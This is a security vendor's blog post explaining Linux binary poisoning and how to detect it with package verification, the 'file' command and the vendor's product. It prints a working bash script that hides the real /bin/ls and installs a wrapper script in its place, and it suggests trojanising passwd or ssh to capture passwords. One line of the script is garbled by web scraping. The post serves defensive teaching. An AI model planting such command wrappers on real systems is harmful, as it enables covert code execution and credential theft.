width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0V0z"></path><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"></path></svg></button></div></div><div class="ss--header__top"><div class="ss--header__container"><div class="ss--header__wrapper"><a class="ss--header__link" href="/under-attack/">Under Attack?</a><a href="https://support.sandflysecurity.com/support/home" class="ss--header__link">Support</a><a class="ss--header__link" href="/contact-us/">Contact Us</a></div></div></div><div class="ss--header__container"><div class="ss--header__wrapper"><a class="ss--header__logo" href="/"><svg class="MuiBox-root css-8atqhb" viewBox="0 0 1000 113" xmlns="http://www.w3.org/2000/svg"><g fill="currentColor" fill-rule="evenodd"><polyline fill="#21f4db" points="69 45 9 7 0 7 0 16 12 40 57 48 12 56 0 80 0 90 9 90 69 52 69 45"></polyline><polygon points="840 18 854 18 854 6 840 6"></polygon><path d="M135 40c-11-2-20-5-20-14 0-8 6-12 17-12 12 0 18 6 20 16h13c-1-17-14-27-33-27s-31 8-31 23c0 17 15 21 29 25 15 4 24 6 24 17 0 7-4 13-18 13-16 0-23-7-24-19H98c1 19 16 31 38 31s32-11 32-26c0-18-16-22-33-27m82 27c0 11-8 16-18 16-8 0-11-3-11-9s5-9 15-11c7-2 12-3 14-5v9Zm15 17c-3 0-3-2-3-7V49c0-16-11-22-23-22-19 0-27 10-28 22h13c0-9 3-12 14-12 9 0 12 4 12 8 0 6-6 8-16 9-15 3-25 7-25 21 0 11 7 18 20 18 10 0 17-4 21-11 1 7 4 10 10 10l6-1v-7h-1Zm11 7h12V53c0-9 7-15 17-15 9 0 12 5 12 14v39h12V48c0-14-9-20-20-20s-17 4-21 9v-8h-12v62m93-8c-12 0-17-11-17-23s5-22 17-22c11 0 17 8 17 22s-6 23-17 23Zm17-78v32c-3-5-9-9-19-9-16 0-28 12-28 32 0 21 12 33 28 33a23 23 0 0 0 19-9v7h12V5h-12Zm42 86V39h11V29h-11v-7c0-7 1-8 6-8h5V4h-7c-10 0-16 4-16 18v7h-9v10h9v52h12"></path><polygon points="415 91 427 91 427 5 415 5"></polygon><path d="M460 91c-2 9-8 12-12 12l-6-1v10l8 1c10 0 16-5 22-20l24-64h-12l-17 48h-1l-18-48h-13l25 62m96-51c-11-2-20-5-20-14 0-8 6-12 17-12 12 0 18 6 20 16h13c-1-17-14-27-33-27s-31 8-31 23c0 17 15 21 29 25 16 4 24 6 24 17 0 7-4 13-18 13-16 0-23-7-24-19h-14c1 19 16 31 38 31s32-11 32-26c0-18-16-22-33-27m53 14c1-10 8-17 18-17 11 0 17 7 17 17h-35Zm48 5c0-19-11-32-30-32-18 0-30 14-30 33s11 33 30 33c17 0 26-9 29-21h-12c-1 4-5 11-16 11-13 0-19-9-19-20h48v-4Zm53-7h12c-1-14-12-24-27-24-19 0-31 13-31 32 0 20 12 33 31 33 15 0 27-11 27-25h-12c0 7-4 15-15 15-14 0-18-11-18-23 0-11 5-23 18-23 11 0 15 8 15 15m34 17V29h-12v43c0 14 9 21 20 21s17-5 21-10v8h12V29h-12v38c0 10-7 16-17 16-9 0-12-6-12-14m53-40v62h12V59c0-12 8-20 19-20l4 1V28h-6c-8 0-13 5-16 13h-1V29h-12"></path><polygon points="841 91 853 91 853 29 841 29"></polygon><path d="M863 29v10h9v35c0 14 6 18 16 18l7-1v-9h-5c-5 0-7-1-7-8V39h12V29h-12V10h-11v19h-9m127-16 5-13h5v18h-3V4l-6 14h-2l-6-14v14h-3V0h5l5 13ZM977 3h-6v15h-3V3h-5V0h14v3Zm-50 86c-2 10-8 12-13 12h-5v10h8c9 0 15-5 21-20l24-62h-12l-17 47-18-47h-13l25 60"></path></g></svg><svg class="MuiBox-root css-8atqhb" viewBox="0 0 541 113" xmlns="http://www.w3.org/2000/svg"><g fill="currentColor" fill-rule="evenodd"><polyline fill="#21f4db" points="70 46 9 7 0 7 0 17 12 41 58 49 12 57 0 81 0 91 9 91 70 52 70 46"></polyline><path d="M137 41c-11-3-21-5-21-15 0-7 6-11 17-11 13 0 19 5 20 16h15c-2-18-15-28-35-28-19 0-31 9-31 24 0 17 16 21 29 25 16 4 25 5 25 16 0 8-5 14-19 14-16 0-23-7-24-19H99c1 19 17 31 39 31s32-11 32-26c0-19-16-23-33-27m83 27c0 11-8 16-19 16-7 0-10-3-10-9s4-9 15-11c7-2 12-3 14-5v9Zm15 17c-3 0-3-2-3-7V50c0-17-11-22-24-22-19 0-26 9-27 21h12c1-8 4-11 15-11 9 0 12 3 12 8 0 6-6 7-16 9-15 3-26 7-26 21 0 11 8 18 20 18 11 0 18-4 22-11 1 8 4 10 10 10l6-1v-7h-1Zm12 7h12V54c0-10 7-16 17-16 9 0 13 6 13 14v40h12V49c0-14-9-21-21-21-11 0-17 5-21 10v-8h-12v62m94-8c-12 0-17-11-17-23 0-13 5-23 17-23 11 0 18 8 18 23 0 14-7 23-18 23Zm18-80v33h-1c-3-5-9-10-19-10-16 0-28 13-28 34s12 33 28 33a23 23 0 0 0 19-9h1v7h12V4h-12Zm41 89V40h12V30h-12v-8c0-6 2-8 7-8h5V5l-8-1c-10 0-16 4-16 18v8h-8v10h8v53h12"></path><polygon points="422 93 434 93 434 5 422 5"></polygon><path d="m531 13 5-13h5v18h-3V3l-6 15h-2l-6-15v15h-3V0h5l5 13ZM518 3h-6v15h-3V3h-6V0h15v3Zm-51 88c-2 9-8 12-13 12l-5-1v10l8 1c9 0 15-5 22-20l24-64h-12l-18 48-18-48h-13l25 62"></path></g></svg></a><div class="ss--header__menu"><nav><ul class="ss--menu__list"><li class="ss--menu__item"><button class="ss--menu__toggle" aria-haspopup="true" aria-controls="menu-0-box" aria-expanded="false" id="menu-0-button" tabindex="0"><span class="ss--menu__link">Platform<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z"></path></svg></span><div class="ss--drop-down ss--drop-down--closed" aria-labelledby="menu-0-button" id="menu-0-box"><ul class="ss--drop-down__list" style="opacity:0;transform:translateY(-32px) translateZ(0)"><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/platform/why-sandfly/"><span><span>Why Sandfly?</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/platform/how-sandfly-works/"><span><span>How Sandfly Works</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/platform/ssh-credential-security/"><span><span>SSH Key Auditing</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/platform/threats-detected/"><span><span>Linux Threats Detected</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/platform/walk-through/"><span><span>Walk Through</span></span></a></li></ul></div></button></li><li class="ss--menu__item"><button class="ss--menu__toggle" aria-haspopup="true" aria-controls="menu-1-box" aria-expanded="false" id="menu-1-button" tabindex="0"><span class="ss--menu__link">Resources<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z"></path></svg></span><div class="ss--drop-down ss--drop-down--closed" aria-labelledby="menu-1-button" id="menu-1-box"><ul class="ss--drop-down__list" style="opacity:0;transform:translateY(-32px) translateZ(0)"><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/resources/product-faqs/"><span><span>Product FAQs</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a href="https://support.sandflysecurity.com/support/solutions/72000030324" target="_blank" rel="noopener noreferrer" class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item"><span><span>Product Documentation</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/resources/third-party-code-verification/"><span><span>Code Security Audits</span></span></a></li></ul></div></button></li><li class="ss--menu__item"><button class="ss--menu__toggle" aria-haspopup="true" aria-controls="menu-2-box" aria-expanded="false" id="menu-2-button" tabindex="0"><span class="ss--menu__link">Customers<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z"></path></svg></span><div class="ss--drop-down ss--drop-down--closed" aria-labelledby="menu-2-button" id="menu-2-box"><ul class="ss--drop-down__list" style="opacity:0;transform:translateY(-32px) translateZ(0)"><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/customers/testimonials/"><span><span>Testimonials</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/customers/case-studies/"><span><span>Case Studies</span></span></a></li></ul></div></button></li><li class="ss--menu__item"><button class="ss--menu__toggle" aria-haspopup="true" aria-controls="menu-3-box" aria-expanded="false" id="menu-3-button" tabindex="0"><span class="ss--menu__link">About<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill="none" d="M0 0h24v24H0z"></path><path d="M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z"></path></svg></span><div class="ss--drop-down ss--drop-down--closed" aria-labelledby="menu-3-button" id="menu-3-box"><ul class="ss--drop-down__list" style="opacity:0;transform:translateY(-32px) translateZ(0)"><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/about-us/our-story/"><span><span>Our Story</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/about-us/partner/"><span><span>Partners and MSSPs</span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/under-attack/"><span><span>Under Attack? </span></span></a></li><li class="ss--menu-item" style="opacity:0;transform:translateY(-16px) translateZ(0)"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-solid ss--button--size-default ss--button--menu-item" tabindex="-1" href="/contact-us/"><span><span>Contact Us </span></span></a></li></ul></div></button></li><li class="ss--menu__item"><a class="ss--menu__link ss--menu__link--parent" exit="[object Object]" entry="[object Object]" href="/blog/">Blog</a></li></ul></nav></div><div class="ss--header__cta"><a class="ss--button ss--button--alignment-left ss--button--color-default ss--button--style-bordered ss--button--size-default" href="/get-sandfly/"><span>Get Sandfly</span></a></div><div class="ss--header__icon"><button class="ss--menu-icon" aria-label="Toggle Menu"><svg viewBox="0 0 40 41"><rect width="18" height="2.25" rx=".5" x="22" y="13"></rect><rect width="18" height="2.25" rx=".5" x="22" y="19" opacity="1"></rect><rect width="18" height="2.25" rx=".5" x="22" y="25"></rect></svg></button></div></div></div></header></div></div><div class="layout__content"><main><nav class="ss--breadcrumbs" aria-label="Breadcrumb"><ul class="ss--breadcrumbs__list"><li class="ss--breadcrumbs__item"><a href="/blog/">Blog</a></li><li class="ss--breadcrumbs__item" aria-current="page"><a aria-current="page" class="" href="/blog/detecting-linux-binary-file-poisoning/">Detecting Linux Binary File Poisoning</a></li></ul></nav><div class="ss--content ss--content--gutters ss--content--text-align-left ss--content--width-small ss--content--improved-typography"><div class="ss--spacer "></div><div><h1>Detecting Linux Binary File Poisoning</h1><p class="ss--post-intro__tags"><a class="ss--post-intro__tag" href="/blog/tag/malware/">Malware</a> <a class="ss--post-intro__tag" href="/blog/tag/rootkits/">Rootkits</a> <a class="ss--post-intro__tag" href="/blog/tag/linux-security/">Linux Security</a> <a class="ss--post-intro__tag" href="/blog/tag/linux-forensics/">Linux Forensics</a></p><div class="ss--post-intro__meta"><dl class="ss--post-intro__date"><dt>Date</dt><dd>June 13, 2018</dd></dl><dl><dt>Author</dt><dd>The Sandfly Security Team</dd></dl></div></div><div class="ss--spacer "></div><div class="MuiBox-root css-1qm1lh"><div class="ss--image ss--image--elevated ss--image--width-medium ss--image--lightbox"><div data-gatsby-image-wrapper="" class="gatsby-image-wrapper gatsby-image-wrapper-constrained ss--image__image"><div style="max-width:768px;display:block"><img alt="" role="presentation" aria-hidden="true" src="data:image/svg+xml;charset=utf-8,%3Csvg height=&#x27;432&#x27; width=&#x27;768&#x27; xmlns=&#x27;http://www.w3.org/2000/svg&#x27; version=&#x27;1.1&#x27;%3E%3C/svg%3E" style="max-width:100%;display:block;position:static"/></div><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" data-src="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768" data-srcset="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768 768w" alt="poison bottle graphic"/><noscript><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" src="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768" srcSet="https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216293-poison-bottle.jpg?auto=format&amp;fit=crop&amp;w=768 768w" alt="poison bottle graphic"/></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div><div class="ss--image__zoom"><button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit MuiIconButton-sizeMedium css-1deacqj" tabindex="0" type="button"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z"></path></svg></button></div></div></div><p>Let’s talk about Linux binary poisoning.</p><p>Binary poisoning is tampering with a system command and replacing it with a malicious version. This can be a wholesale replacement with a new file designed to act like the old command, or tampering with the in-place executable so it runs malicious code directly.</p><p>Why does this matter? Well if you poison a command, and an unsuspecting user runs that command, then you can execute code as that user. Here’s an example output from a poisoned <em>ls</em> command:</p><pre><code>root@example:~# ls -al /bin
total 16060
drwxr-xr-x 4 root root 4096 Jun 12 22:17 .
drwxr-xr-x 23 root root 4096 Jun 12 22:15 ..
-rwxr-xr-x 1 root root 1037528 May 16 2017 bash
drwxr-xr-x 2 root root 4096 Jun 12 22:17 .bin
-rwxr-xr-x 1 root root 520992 Jun 15 2017 btrfs
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-calc-size
lrwxrwxrwx 1 root root 5 Jun 15 2017 btrfsck -&gt; btrfs
-rwxr-xr-x 1 root root 278376 Jun 15 2017 btrfs-convert
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-debug-tree
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-find-root
-rwxr-xr-x 1 root root 270136 Jun 15 2017 btrfs-image
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfs-map-logical
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-select-super
-rwxr-xr-x 1 root root 253816 Jun 15 2017 btrfs-show-super
-rwxr-xr-x 1 root root 249464 Jun 15 2017 btrfstune
-rwxr-xr-x 1 root root 245368 Jun 15 2017 btrfs-zero-log
-rwxr-xr-x 3 root root 31288 May 20 2015 bunzip2
-rwxr-xr-x 1 root root 1964536 Aug 19 2015 busybox
-rwxr-xr-x 3 root root 31288 May 20 2015 bzcat
lrwxrwxrwx 1 root root 6 May 20 2015 bzcmp -&gt; bzdiff
-rwxr-xr-x 1 root root 2140 May 20 2015 bzdiff
...
-rwxr-xr-x 1 root root 89 Jun 12 22:17 ls
...
-rwxr-xr-x 1 root root 5764 Oct 27 2014 zdiff
-rwxr-xr-x 1 root root 140 Oct 27 2014 zegrep
-rwxr-xr-x 1 root root 140 Oct 27 2014 zfgrep
-rwxr-xr-x 1 root root 2131 Oct 27 2014 zforce
-rwxr-xr-x 1 root root 5938 Oct 27 2014 zgrep
-rwxr-xr-x 1 root root 2037 Oct 27 2014 zless
-rwxr-xr-x 1 root root 1910 Oct 27 2014 zmore
-rwxr-xr-x 1 root root 5047 Oct 27 2014 znew
POISONED /bin/ls active!
root@example:~#</code></pre><p>Here the <em>ls</em> command worked as normal, but when it completed it printed the text <strong>“POISONED /bin/ls active!”</strong> to the console. What we’ve done here is replace the normal <em>ls</em> command with a script to run arbitrary commands along with <em>ls</em>.</p><h2>How to Poison a Binary</h2><p>Let’s look at the script used to poison the <em>ls</em> command. <strong>Do not run this on a production system.</strong> Spin up a disposable virtual host to beat on when tampering with core system commands!</p><pre><code>#!/usr/bin/env bash
# Linux binary poisoning example.
# Based on backdoorme poison script.

echo &quot;Poisoning ls command.&quot;
echo &quot;Making backup of ls to /bin/ls.bak&quot;
if [ [Watch the video here]-f /bin/ls.bak ]; then
    cp /bin/ls /bin/ls.bak
fi

echo &quot;Making /bin/.bin to hold original binary&quot;
mkdir /bin/.bin
echo &quot;Moving original binary to /bin/.bin&quot;
mv /bin/ls /bin/.bin/

echo &quot;Creating poisoned ls script in /bin&quot;
echo &quot;#!/bin/bash&quot; &gt; /bin/ls
echo &quot;( ls &amp; ) &gt; /dev/null 2&gt;&amp;1 &amp;&amp; /bin/.bin/ls \$@&quot; &gt;&gt; /bin/ls
echo &quot;echo \&quot;POISONED /bin/ls active!\&quot;&quot; &gt;&gt; /bin/ls
chmod +x /bin/ls

echo &quot;Done&quot;</code></pre><p>Let’s go over what is going on here:</p><ol><li><p>We make a backup of <em>/bin/ls</em> so you can back out the changes this script made easily for the demo.</p></li><li><p>We make a hidden directory called <em>/bin/.bin</em> to hold the original command.</p></li><li><p>We move the original <em>/bin/ls</em> to <em>/bin/.bin/ls</em>.</p></li><li><p>We now create a new script as <em>/bin/ls</em>. This script has the following in it:</p></li></ol><pre><code>#!/bin/bash
( ls &amp; ) &gt; /dev/null 2&gt;&amp;1 &amp;&amp; /bin/.bin/ls $@
echo &quot;POISONED /bin/ls active!&quot;</code></pre><ol><li><p>We set executable permission on this script and exit.</p></li></ol><p>The new <em>/bin/ls</em> script takes the command line arguments and sends them to the real hidden <em>/bin/.bin/ls</em> command. But more</p><p>Of course we don’t have to send a message. We could do all sorts of things such as check for your UID and execute commands as you, open a new backdoor, <a href="/blog/linux-malware-persistence-with-cron/">insert new persistence commands</a> in <em>cron</em>, etc. The list is endless. Every time you run <em>ls</em> our malicious commands will run.</p><p>We don’t even have to use <em>ls</em> of course. We could use <em>passwd</em>, <em>ssh</em>, or other critical system commands to grab passwords and help us gain access to other hosts as you do your normal activity. There are other ways to spice this up, but we’ll leave it to your imagination.</p><h2>Manually Finding Poisoned Commands on Linux</h2><p>Finding poisoned commands is quite time consuming if you want to do it by hand. For instance just on Ubuntu under the <em>/bin</em> and <em>/sbin</em> directories there are easily over 500+ commands. If you throw in <em>/usr/bin</em> and <em>/usr/sbin</em> you are at thousands of commands. So, the first thing to try is to run package verification to speed up the process.</p><p>Package verification will be one of the following depending on your version of Linux:</p><pre><code>Redhat based

rpm -Va | grep ^..5.

Debian/Ubuntu based

debsums -c</code></pre><p>In the above, we ran the debsums command on the affected Ubuntu host and we immediately see a problem:</p><pre><code>root@example:~# debsums -c
/bin/ls</code></pre><p>Next thing if package verification shows nothing is to run the <em>file</em> command against your core system binary directories and look for any files that are not ELF executables. Yes, an attacker can replace a binary with another compiled binary. However, a shell replacement is the easiest to pull off and doesn’t require an attacker loading up any pre-compiled files or source code that may break or alter the system too much (loading the full gcc compiler may be noticed).</p><p>The command below will show us any command that is not a compiled executable. It also will ignore any file that is a link to another file:</p><pre><code>file /bin/* | grep -v ELF | grep -v link</code></pre><pre><code>root@example:~# file /bin/* | grep -v ELF | grep -v link
/bin/bzdiff: POSIX shell script, ASCII text executable
/bin/bzexe: POSIX shell script, ASCII text executable
/bin/bzgrep: POSIX shell script, ASCII text executable
/bin/bzmore: POSIX shell script, ASCII text executable
/bin/egrep: POSIX shell script, ASCII text executable
/bin/fgrep: POSIX shell script, ASCII text executable
/bin/fsck.btrfs: POSIX shell script, ASCII text executable
/bin/gunzip: POSIX shell script, ASCII text executable
/bin/gzexe: POSIX shell script, ASCII text executable
/bin/lesspipe: POSIX shell script, ASCII text executable
/bin/ls: Bourne-Again shell script, ASCII text executable
/bin/red: POSIX shell script, ASCII text executable
/bin/setupcon: POSIX shell script, UTF-8 Unicode text executable
/bin/uncompress: POSIX shell script, ASCII text executable
/bin/unicode_start: POSIX shell script, ASCII text executable
/bin/which: POSIX shell script, ASCII text executable
/bin/zcat: POSIX shell script, ASCII text executable
/bin/zcmp: POSIX shell script, ASCII text executable
/bin/zdiff: POSIX shell script, ASCII text executable
/bin/zegrep: POSIX shell script, ASCII text executable
/bin/zfgrep: POSIX shell script, ASCII text executable
/bin/zforce: POSIX shell script, ASCII text executable
/bin/zgrep: POSIX shell script, ASCII text executable
/bin/zless: POSIX shell script, ASCII text executable
/bin/zmore: POSIX shell script, ASCII text executable
/bin/znew: POSIX shell script, ASCII text executable
root@example:~#</code></pre><p>Looking at the above you’ll have to eyeball anything that looks suspicious. It is perfectly normal for some commands to be scripts, but in the above the <em>ls</em> command is listed as a script and that is definitely not normal.</p><p>If you suspect a command may be poisoned, go look at it directly with the strings command to see if anything pops out. <strong>Do not run </strong><em><strong>strace</strong></em><strong> on any file you think may be malicious.</strong> We put that in bold because some people may want to try the strace command, but when you run strace it runs the actual executable file on the host which is a really bad idea.</p><p>You can also use a standard file integrity monitor to spot this kind of activity if you set it up avoid a lot of false alarms.</p><h2>Automatically Finding Poisoned Commands on Linux</h2><p>This is the Sandfly blog, so we’re going to show you how Sandfly’s automated agentless intrusion detection can spot this kind of attack easily. Here is what a host with a poisoned <em>/bin/ls</em> like above will show in Sandfly:</p><div class="MuiBox-root css-1qm1lh"><div class="ss--image ss--image--elevated ss--image--width-medium ss--image--lightbox"><div data-gatsby-image-wrapper="" class="gatsby-image-wrapper gatsby-image-wrapper-constrained ss--image__image"><div style="max-width:768px;display:block"><img alt="" role="presentation" aria-hidden="true" src="data:image/svg+xml;charset=utf-8,%3Csvg height=&#x27;215&#x27; width=&#x27;768&#x27; xmlns=&#x27;http://www.w3.org/2000/svg&#x27; version=&#x27;1.1&#x27;%3E%3C/svg%3E" style="max-width:100%;display:block;position:static"/></div><img aria-hidden="true" data-placeholder-image="" style="opacity:1;transition:opacity 500ms linear" decoding="async" src="" alt=""/><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" data-src="https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;fit=crop&amp;w=768" data-srcset="https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Sandfly Poisoned Linux Binary Alarms"/><noscript><img data-gatsby-image-ssr="" data-main-image="" style="opacity:0" sizes="(min-width: 768px) 768px, 100vw" decoding="async" loading="lazy" src="https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;fit=crop&amp;w=768" srcSet="https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;dpr=0.25&amp;fit=crop&amp;w=768 192w,https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;dpr=0.5&amp;fit=crop&amp;w=768 384w,https://www.datocms-assets.com/56687/1635216304-poisoned-linux-binary-alarms.png?auto=format&amp;fit=crop&amp;w=768 768w" alt="Sandfly Poisoned Linux Binary Alarms"/></noscript><script type="module">const t="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;if(t){const t=document.querySelectorAll("img[data-main-image]");for(let e of t){e.dataset.src&&(e.setAttribute("src",e.dataset.src),e.removeAttribute("data-src")),e.dataset.srcset&&(e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset"));const t=e.parentNode.querySelectorAll("source[data-srcset]");for(let e of t)e.setAttribute("srcset",e.dataset.srcset),e.removeAttribute("data-srcset");e.complete&&(e.style.opacity=1,e.parentNode.parentNode.querySelector("[data-placeholder-image]").style.opacity=0)}}</script></div><div class="ss--image__zoom"><button class="MuiButtonBase-root MuiIconButton-root MuiIconButton-colorInherit MuiIconButton-sizeMedium css-1deacqj" tabindex="0" type="button"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M505 442.7L405.3 343c-4.5-4.5-10.6-7-17-7H372c27.6-35.3 44-79.7 44-128C416 93.1 322.9 0 208 0S0 93.1 0 208s93.1 208 208 208c48.3 0 92.7-16.4 128-44v16.3c0 6.4 2.5 12.5 7 17l99.7 99.7c9.4 9.4 24.6 9.4 33.9 0l28.3-28.3c9.4-9.4 9.4-24.6.1-34zM208 336c-70.7 0-128-57.2-128-128 0-70.7 57.2-128 128-128 70.7 0 128 57.2 128 128 0 70.7-57.2 128-128 128z"></path></svg></button></div></div></div><p>What’s that? We have <em>two</em> alarms here. The first was our poisoned binary alert, but what about the hidden directory? Did you miss it? It’s easy to miss something like that. Go up above and look at the directory listing again and notice this:</p><pre><code>root@example:~# ls -al /bin 
total 16060 
drwxr-xr-x 4 root root 4096 Jun 12 22:17 . 
drwxr-xr-x 23 root root 4096 Jun 12 22:15 .. 
-rwxr-xr-x 1 root root 1037528 May 16 2017 bash 
drwxr-xr-x 2 root root 4096 Jun 12 22:17 .bin
